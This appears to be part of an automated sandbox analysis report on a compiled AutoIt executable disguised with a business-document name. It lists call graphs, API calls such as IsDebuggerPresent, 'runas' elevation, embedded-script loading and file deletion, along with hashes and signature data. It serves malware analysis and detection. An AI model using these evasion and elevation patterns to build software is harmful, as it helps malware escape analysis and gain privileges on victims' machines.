7c7667 59 API calls 102957->102958 102959 7cf7eb 102958->102959 102960 7c7667 59 API calls 102959->102960 102961 7cf7f5 102960->102961 102962 7c7667 59 API calls 102961->102962 102963 7cf833 102962->102963 102964 7c7667 59 API calls 102963->102964 102965 7cf8fe 102964->102965 102993 7d5f87 102965->102993 102969 7cf930 102970 7c7667 59 API calls 102969->102970 102971 7cf93a 102970->102971 103021 7dfd9e 102971->103021 102973 7cf981 102974 7cf991 GetStdHandle 102973->102974 102975 7cf9dd 102974->102975 102976 8045ab 102974->102976 102977 7cf9e5 OleInitialize 102975->102977 102976->102975 102978 8045b4 102976->102978 102977->102947 103028 826b38 64 API calls Mailbox 102978->103028 102980 8045bb 103029 827207 CreateThread 102980->103029 102982 8045c7 CloseHandle 102982->102977 103030 7dffdc 102983->103030 102986 7dffdc 59 API calls 102987 7dff45 102986->102987 102988 7c7667 59 API calls 102987->102988 102989 7dff51 102988->102989 102990 7c7bcc 59 API calls 102989->102990 102991 7cf796 102990->102991 102992 7e0162 6 API calls 102991->102992 102992->102955 102994 7c7667 59 API calls 102993->102994 102995 7d5f97 102994->102995 102996 7c7667 59 API calls 102995->102996 102997 7d5f9f 102996->102997 103037 7d5a9d 102997->103037 103000 7d5a9d 59 API calls 103001 7d5faf 103000->103001 103002 7c7667 59 API calls 103001->103002 103003 7d5fba 103002->103003 103004 7e0db6 Mailbox 59 API calls 103003->103004 103005 7cf908 103004->103005 103006 7d60f9 103005->103006 103007 7d6107 103006->103007 103008 7c7667 59 API calls 103007->103008 103009 7d6112 103008->103009 103010 7c7667 59 API calls 103009->103010 103011 7d611d 103010->103011 103012 7c7667 59 API calls 103011->103012 103013 7d6128 103012->103013 103014 7c7667 59 API calls 103013->103014 103015 7d6133 103014->103015 103016 7d5a9d 59 API calls 103015->103016 103017 7d613e 103016->103017 103018 7e0db6 Mailbox 59 API calls 103017->103018 103019 7d6145 RegisterWindowMessageW 103018->103019 103019->102969 103022 7dfdae 103021->103022 103023 81576f 103021->103023 103024 7e0db6 Mailbox 59 API calls 103022->103024 103040 829ae7 60 API calls 103023->103040 103026 7dfdb6 103024->103026 103026->102973 103027 81577a 103028->102980 103029->102982 103041 8271ed 65 API calls 103029->103041 103031 7c7667 59 API calls 103030->103031 103032 7dffe7 103031->103032 103033 7c7667 59 API calls 103032->103033 103034 7dffef 103033->103034 103035 7c7667 59 API calls 103034->103035 103036 7dff3b 103035->103036 103036->102986 103038 7c7667 59 API calls 103037->103038 103039 7d5aa5 103038->103039 103039->103000 103040->103027 103042 7c1016 103047 7c4974 103042->103047 103045 7e2d40 __cinit 67 API calls 103046 7c1025 103045->103046 103048 7e0db6 Mailbox 59 API calls 103047->103048 103049 7c497c 103048->103049 103050 7c101b 103049->103050 103054 7c4936 103049->103054 103050->103045 103055 7c493f 103054->103055 103056 7c4951 103054->103056 103057 7e2d40 __cinit 67 API calls 103055->103057 103058 7c49a0 103056->103058 103057->103056 103059 7c7667 59 API calls 103058->103059 103060 7c49b8 GetVersionExW 103059->103060 103061 7c7bcc 59 API calls 103060->103061 103062 7c49fb 103061->103062 103063 7c7d2c 59 API calls 103062->103063 103074 7c4a28 103062->103074 103064 7c4a1c 103063->103064 103065 7c7726 59 API calls 103064->103065 103065->103074 103066 7c4a93 GetCurrentProcess IsWow64Process 103067 7c4aac 103066->103067 103069 7c4b2b GetSystemInfo 103067->103069 103070 7c4ac2 103067->103070 103068 7fd864 103071 7c4af8 103069->103071 103082 7c4b37 103070->103082 103071->103050 103074->103066 103074->103068 103075 7c4b1f GetSystemInfo 103078 7c4ae9 103075->103078 103076 7c4ad4 103077 7c4b37 2 API calls 103076->103077 103079 7c4adc GetNativeSystemInfo 103077->103079 103078->103071 103080 7c4aef FreeLibrary 103078->103080 103079->103078 103080->103071 103083 7c4ad0 103082->103083 103084 7c4b40 LoadLibraryA 103082->103084 103083->103075 103083->103076 103084->103083 103085 7c4b51 GetProcAddress 103084->103085 103085->103083 103086 7c3633 103087 7c366a 103086->103087 103088 7c36e5 103087->103088 103089 7c3688 103087->103089 103090 7c36e7 103087->103090 103093 7c36ca DefWindowProcW 103088->103093 103091 7c374b PostQuitMessage 103089->103091 103092 7c3695 103089->103092 103094 7c36ed 103090->103094 103095 7fd0cc 103090->103095 103099 7c36d8 103091->103099 103097 7fd154 103092->103097 103098 7c36a0 103092->103098 103093->103099 103100 7c3715 SetTimer RegisterWindowMessageW 103094->103100 103101 7c36f2 103094->103101 103135 7d1070 10 API calls Mailbox 103095->103135 103140 822527 71 API calls _memset 103097->103140 103103 7c36a8 103098->103103 103104 7c3755 103098->103104 103100->103099 103105 7c373e CreatePopupMenu 103100->103105 103107 7fd06f 103101->103107 103108 7c36f9 KillTimer 103101->103108 103102 7fd0f3 103136 7d1093 331 API calls Mailbox 103102->103136 103110 7fd139 103103->103110 103111 7c36b3 103103->103111 103133 7c44a0 64 API calls _memset 103104->103133 103105->103099 103114 7fd0a8 MoveWindow 103107->103114 103115 7fd074 103107->103115 103131 7c443a Shell_NotifyIconW _memset 103108->103131 103110->103093 103139 817c36 59 API calls Mailbox 103110->103139 103117 7c36be 103111->103117 103118 7fd124 103111->103118 103112 7fd166 103112->103093 103112->103099 103114->103099 103120 7fd078 103115->103120 103121 7fd097 SetFocus 103115->103121 103117->103093 103137 7c443a Shell_NotifyIconW _memset 103117->103137 103138 822d36 81 API calls _memset 103118->103138 103119 7c3764 103119->103099 103120->103117 103124 7fd081 103120->103124 103121->103099 103122 7c370c 103132 7c3114 DeleteObject DestroyWindow Mailbox 103122->103132 103134 7d1070 10 API calls Mailbox 103124->103134 103129 7fd118 103130 7c434a 68 API calls 103129->103130 103130->103088 103131->103122 103132->103099 103133->103119 103134->103099 103135->103102 103136->103117 103137->103129 103138->103119 103139->103088 103140->103112 103141 828d0d 103142 828d20 103141->103142 103143 828d1a 103141->103143 103145 828d31 103142->103145 103146 7e2d55 _free 58 API calls 103142->103146 103144 7e2d55 _free 58 API calls 103143->103144 103144->103142 103147 7e2d55 _free 58 API calls 103145->103147 103148 828d43 103145->103148 103146->103145 103147->103148 103149 f74348 103163 f71f98 103149->103163 103151 f74413 103166 f74238 103151->103166 103169 f75438 GetPEB 103163->103169 103165 f72623 103165->103151 103167 f74241 Sleep 103166->103167 103168 f7424f 103167->103168 103170 f75462 103169->103170 103170->103165 103171 80416f 103175 815fe6 103171->103175 103173 80417a 103174 815fe6 85 API calls 103173->103174 103174->103173 103176 816020 103175->103176 103180 815ff3 103175->103180 103176->103173 103177 816022 103187 7c9328 84 API calls Mailbox 103177->103187 103178 816027 103181 7c9837 84 API calls 103178->103181 103180->103176 103180->103177 103180->103178 103184 81601a 103180->103184 103182 81602e 103181->103182 103183 7c7b2e 59 API calls 103182->103183 103183->103176 103186 7c95a0 59 API calls _wcsstr 103184->103186 103186->103176 103187->103178

                                                        Executed Functions

                                                        Function 007C3B3A Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 153windowCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 007C3B68
                                                        • IsDebuggerPresent.KERNEL32 ref: 007C3B7A
                                                        • GetFullPathNameW.KERNEL32(00007FFF,?,?,008852F8,008852E0,?,?), ref: 007C3BEB
                                                          • Part of subcall function 007C7BCC: _memmove.LIBCMT ref: 007C7C06
                                                          • Part of subcall function 007D092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,007C3C14,008852F8,?,?,?), ref: 007D096E
                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 007C3C6F
                                                        • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00877770,00000010), ref: 007FD281
                                                        • SetCurrentDirectoryW.KERNEL32(?,008852F8,?,?,?), ref: 007FD2B9
                                                        • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00874260,008852F8,?,?,?), ref: 007FD33F
                                                        • ShellExecuteW.SHELL32(00000000,?,?), ref: 007FD346
                                                          • Part of subcall function 007C3A46: GetSysColorBrush.USER32(0000000F), ref: 007C3A50
                                                          • Part of subcall function 007C3A46: LoadCursorW.USER32(00000000,00007F00), ref: 007C3A5F
                                                          • Part of subcall function 007C3A46: LoadIconW.USER32(00000063), ref: 007C3A76
                                                          • Part of subcall function 007C3A46: LoadIconW.USER32(000000A4), ref: 007C3A88
                                                          • Part of subcall function 007C3A46: LoadIconW.USER32(000000A2), ref: 007C3A9A
                                                          • Part of subcall function 007C3A46: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 007C3AC0
                                                          • Part of subcall function 007C3A46: RegisterClassExW.USER32(?), ref: 007C3B16
                                                          • Part of subcall function 007C39D5: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 007C3A03
                                                          • Part of subcall function 007C39D5: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 007C3A24
                                                          • Part of subcall function 007C39D5: ShowWindow.USER32(00000000,?,?), ref: 007C3A38
                                                          • Part of subcall function 007C39D5: ShowWindow.USER32(00000000,?,?), ref: 007C3A41
                                                          • Part of subcall function 007C434A: _memset.LIBCMT ref: 007C4370
                                                          • Part of subcall function 007C434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 007C4415
                                                        Strings
                                                        • runas, xrefs: 007FD33A
                                                        • This is a third-party compiled AutoIt script., xrefs: 007FD279
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                        • String ID: This is a third-party compiled AutoIt script.$runas
                                                        • API String ID: 529118366-3287110873
                                                        • Opcode ID: 15ea0927efc31b2278511faa0b15b9090dc490cc1b12d37772a4bdab00d6a610
                                                        • Instruction ID: 837888d9d1701e6eb96eaa1584603f97903f64c217ee5aebf304baca458e64e5
                                                        • Opcode Fuzzy Hash: 15ea0927efc31b2278511faa0b15b9090dc490cc1b12d37772a4bdab00d6a610
                                                        • Instruction Fuzzy Hash: 9B51BF31908148EADB25EBB8DC0AFFD7B79BF45750F00806DF525A22A2DF785A45CB21
                                                        Function 007C49A0 Relevance: 10.7, APIs: 7, Instructions: 223COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 998 7c49a0-7c4a00 call 7c7667 GetVersionExW call 7c7bcc 1003 7c4b0b-7c4b0d 998->1003 1004 7c4a06 998->1004 1005 7fd767-7fd773 1003->1005 1006 7c4a09-7c4a0e 1004->1006 1007 7fd774-7fd778 1005->1007 1008 7c4a14 1006->1008 1009 7c4b12-7c4b13 1006->1009 1011 7fd77b-7fd787 1007->1011 1012 7fd77a 1007->1012 1010 7c4a15-7c4a4c call 7c7d2c call 7c7726 1008->1010 1009->1010 1020 7fd864-7fd867 1010->1020 1021 7c4a52-7c4a53 1010->1021 1011->1007 1014 7fd789-7fd78e 1011->1014 1012->1011 1014->1006 1016 7fd794-7fd79b 1014->1016 1016->1005 1018 7fd79d 1016->1018 1022 7fd7a2-7fd7a5 1018->1022 1023 7fd869 1020->1023 1024 7fd880-7fd884 1020->1024 1021->1022 1025 7c4a59-7c4a64 1021->1025 1026 7fd7ab-7fd7c9 1022->1026 1027 7c4a93-7c4aaa GetCurrentProcess IsWow64Process 1022->1027 1028 7fd86c 1023->1028 1032 7fd86f-7fd878 1024->1032 1033 7fd886-7fd88f 1024->1033 1029 7fd7ea-7fd7f0 1025->1029 1030 7c4a6a-7c4a6c 1025->1030 1026->1027 1031 7fd7cf-7fd7d5 1026->1031 1034 7c4aac 1027->1034 1035 7c4aaf-7c4ac0 1027->1035 1028->1032 1040 7fd7fa-7fd800 1029->1040 1041 7fd7f2-7fd7f5 1029->1041 1036 7fd805-7fd811 1030->1036 1037 7c4a72-7c4a75 1030->1037 1038 7fd7df-7fd7e5 1031->1038 1039 7fd7d7-7fd7da 1031->1039 1032->1024 1033->1028 1042 7fd891-7fd894 1033->1042 1034->1035 1043 7c4b2b-7c4b35 GetSystemInfo 1035->1043 1044 7c4ac2-7c4ad2 call 7c4b37 1035->1044 1048 7fd81b-7fd821 1036->1048 1049 7fd813-7fd816 1036->1049 1045 7c4a7b-7c4a8a 1037->1045 1046 7fd831-7fd834 1037->1046 1038->1027 1039->1027 1040->1027 1041->1027 1042->1032 1047 7c4af8-7c4b08 1043->1047 1055 7c4b1f-7c4b29 GetSystemInfo 1044->1055 1056 7c4ad4-7c4ae1 call 7c4b37 1044->1056 1053 7fd826-7fd82c 1045->1053 1054 7c4a90 1045->1054 1046->1027 1052 7fd83a-7fd84f 1046->1052 1048->1027 1049->1027 1057 7fd859-7fd85f 1052->1057 1058 7fd851-7fd854 1052->1058 1053->1027 1054->1027 1060 7c4ae9-7c4aed 1055->1060 1063 7c4b18-7c4b1d 1056->1063 1064 7c4ae3-7c4ae7 GetNativeSystemInfo 1056->1064 1057->1027 1058->1027 1060->1047 1062 7c4aef-7c4af2 FreeLibrary 1060->1062 1062->1047 1063->1064 1064->1060
                                                        APIs
                                                        • GetVersionExW.KERNEL32(?), ref: 007C49CD
                                                          • Part of subcall function 007C7BCC: _memmove.LIBCMT ref: 007C7C06
                                                        • GetCurrentProcess.KERNEL32(?,0084FAEC,00000000,00000000,?), ref: 007C4A9A
                                                        • IsWow64Process.KERNEL32(00000000), ref: 007C4AA1
                                                        • GetNativeSystemInfo.KERNELBASE(00000000), ref: 007C4AE7
                                                        • FreeLibrary.KERNEL32(00000000), ref: 007C4AF2
                                                        • GetSystemInfo.KERNEL32(00000000), ref: 007C4B23
                                                        • GetSystemInfo.KERNEL32(00000000), ref: 007C4B2F
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                        • String ID:
                                                        • API String ID: 1986165174-0
                                                        • Opcode ID: d826487ceb517c5a26bc393c80021a62675e1547927e9efdb4f7a5ed45f0bb2d
                                                        • Instruction ID: e59f4a58015ebea17721f9aa1447855271860badac2333667713624dfc974b29
                                                        • Opcode Fuzzy Hash: d826487ceb517c5a26bc393c80021a62675e1547927e9efdb4f7a5ed45f0bb2d
                                                        • Instruction Fuzzy Hash: A291C6319897C4DEC731DB788860AAEBFF5AF3A300B48495DD1C797B41D228A908D769
                                                        Function 007C4E89 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1065 7c4e89-7c4ea1 CreateStreamOnHGlobal 1066 7c4ec1-7c4ec6 1065->1066 1067 7c4ea3-7c4eba FindResourceExW 1065->1067 1068 7fd933-7fd942 LoadResource 1067->1068 1069 7c4ec0 1067->1069 1068->1069 1070 7fd948-7fd956 SizeofResource 1068->1070 1069->1066 1070->1069 1071 7fd95c-7fd967 LockResource 1070->1071 1071->1069 1072 7fd96d-7fd98b 1071->1072 1072->1069
                                                        APIs
                                                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,007C4D8E,?,?,00000000,00000000), ref: 007C4E99
                                                        • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,007C4D8E,?,?,00000000,00000000), ref: 007C4EB0
                                                        • LoadResource.KERNEL32(?,00000000,?,?,007C4D8E,?,?,00000000,00000000,?,?,?,?,?,?,007C4E2F), ref: 007FD937
                                                        • SizeofResource.KERNEL32(?,00000000,?,?,007C4D8E,?,?,00000000,00000000,?,?,?,?,?,?,007C4E2F), ref: 007FD94C
                                                        • LockResource.KERNEL32(007C4D8E,?,?,007C4D8E,?,?,00000000,00000000,?,?,?,?,?,?,007C4E2F,00000000), ref: 007FD95F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                        • String ID: SCRIPT
                                                        • API String ID: 3051347437-3967369404
                                                        • Opcode ID: 19ada50a1c8aaa3fba431a421ab4d29055bee01287630a105acad23f0bf34c5c
                                                        • Instruction ID: 0c5dd78026f0b3bbb8494321994b4df62c1ab171b1b95f9933db5db20b071868
                                                        • Opcode Fuzzy Hash: 19ada50a1c8aaa3fba431a421ab4d29055bee01287630a105acad23f0bf34c5c
                                                        • Instruction Fuzzy Hash: DE115A75240710BFD7218BA5EC48F677BBAFBC6B11F20426CF606C6250DBA1EC00CA60
                                                        Function 007CFCE0 Relevance: 5.5, APIs: 3, Instructions: 1040COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: BuffCharUpper
                                                        • String ID:
                                                        • API String ID: 3964851224-0
                                                        • Opcode ID: be6a84454887b9bc91b586ff05d6b3bf69bde1e0431b15d98c0aee53882e9ced
                                                        • Instruction ID: cd5d6356901abf9c7829931e4a4d24fd4d8c1a9ac0293bea60d7d0725af6c33c
                                                        • Opcode Fuzzy Hash: be6a84454887b9bc91b586ff05d6b3bf69bde1e0431b15d98c0aee53882e9ced
                                                        • Instruction Fuzzy Hash: A7925770608341DFD760DF24C484B2ABBE1FB89304F14996DE98A9B362D779EC45CB92
                                                        Function 0082445A Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetFileAttributesW.KERNELBASE(?,007FE398), ref: 0082446A
                                                        • FindFirstFileW.KERNELBASE(?,?), ref: 0082447B
                                                        • FindClose.KERNEL32(00000000), ref: 0082448B
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: FileFind$AttributesCloseFirst
                                                        • String ID:
                                                        • API String ID: 48322524-0
                                                        • Opcode ID: 0a6ac38690f562f8cc1a4c044fde74186557d12eb336b55a375d641548f7d2a8
                                                        • Instruction ID: 1f8a3340975042db7f4567280d58b34eb5e25a5fd97f7007f4c6e65ebc5901cc
                                                        • Opcode Fuzzy Hash: 0a6ac38690f562f8cc1a4c044fde74186557d12eb336b55a375d641548f7d2a8
                                                        • Instruction Fuzzy Hash: 10E0D8364119246B42107B38FC0D4EA775CFE06335F10071AFA35D11D0F7B45940D5A9
                                                        Function 007D09D0 Relevance: 57.3, APIs: 27, Strings: 5, Instructions: 1300windowsleeptimeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 007D0A5B
                                                        • timeGetTime.WINMM ref: 007D0D16
                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 007D0E53
                                                        • Sleep.KERNEL32(0000000A), ref: 007D0E61
                                                        • LockWindowUpdate.USER32(00000000,?,?), ref: 007D0EFA
                                                        • DestroyWindow.USER32 ref: 007D0F06
                                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 007D0F20
                                                        • Sleep.KERNEL32(0000000A,?,?), ref: 00804E83
                                                        • TranslateMessage.USER32(?), ref: 00805C60
                                                        • DispatchMessageW.USER32(?), ref: 00805C6E
                                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00805C82
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
                                                        • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                        • API String ID: 4212290369-3242690629
                                                        • Opcode ID: 1eb5ca69e48a39d1ef53173eef5b75c91aac8a7adc5767cc5299508a1907539a
                                                        • Instruction ID: 7b3c446cd7b2e88e81e46fecb807cb59742a68620d6dc83c33e8f9e2ee94df5e
                                                        • Opcode Fuzzy Hash: 1eb5ca69e48a39d1ef53173eef5b75c91aac8a7adc5767cc5299508a1907539a
                                                        • Instruction Fuzzy Hash: 06B2AE70608741DFD764DB24C888BABB7E5FF84304F14491EE589D72A1DB79E884CBA2
                                                        Function 00829155 Relevance: 19.8, APIs: 13, Instructions: 322fileCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                          • Part of subcall function 00828F5F: __time64.LIBCMT ref: 00828F69
                                                          • Part of subcall function 007C4EE5: _fseek.LIBCMT ref: 007C4EFD
                                                        • __wsplitpath.LIBCMT ref: 00829234
                                                          • Part of subcall function 007E40FB: __wsplitpath_helper.LIBCMT ref: 007E413B
                                                        • _wcscpy.LIBCMT ref: 00829247
                                                        • _wcscat.LIBCMT ref: 0082925A
                                                        • __wsplitpath.LIBCMT ref: 0082927F
                                                        • _wcscat.LIBCMT ref: 00829295
                                                        • _wcscat.LIBCMT ref: 008292A8
                                                          • Part of subcall function 00828FA5: _memmove.LIBCMT ref: 00828FDE
                                                          • Part of subcall function 00828FA5: _memmove.LIBCMT ref: 00828FED
                                                        • _wcscmp.LIBCMT ref: 008291EF
                                                          • Part of subcall function 00829734: _wcscmp.LIBCMT ref: 00829824
                                                          • Part of subcall function 00829734: _wcscmp.LIBCMT ref: 00829837
                                                        • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00829452
                                                        • _wcsncpy.LIBCMT ref: 008294C5
                                                        • DeleteFileW.KERNEL32(?,?), ref: 008294FB
                                                        • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00829511
                                                        • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00829522
                                                        • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00829534
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                        • String ID:
                                                        • API String ID: 1500180987-0
                                                        • Opcode ID: 25a102fa342bd81f8684983cd7bc6a0a44031708fefe68889324016f7e7692c6
                                                        • Instruction ID: 1d28ab68a73da858a77367865582571c775563b1ed40b08e5b1a6346cfcf5e20
                                                        • Opcode Fuzzy Hash: 25a102fa342bd81f8684983cd7bc6a0a44031708fefe68889324016f7e7692c6
                                                        • Instruction Fuzzy Hash: D2C13CB1E00229AADF11DF95DC85EDEBBBDFF49310F0040AAF609E6141DB349A848F65
                                                        Function 007C708B Relevance: 19.5, APIs: 6, Strings: 5, Instructions: 201registryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                          • Part of subcall function 007C4706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,008852F8,?,007C37AE,?), ref: 007C4724
                                                          • Part of subcall function 007E050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,007C7165), ref: 007E052D
                                                        • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 007C71A8
                                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 007FE8C8
                                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 007FE909
                                                        • RegCloseKey.ADVAPI32(?), ref: 007FE947
                                                        • _wcscat.LIBCMT ref: 007FE9A0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
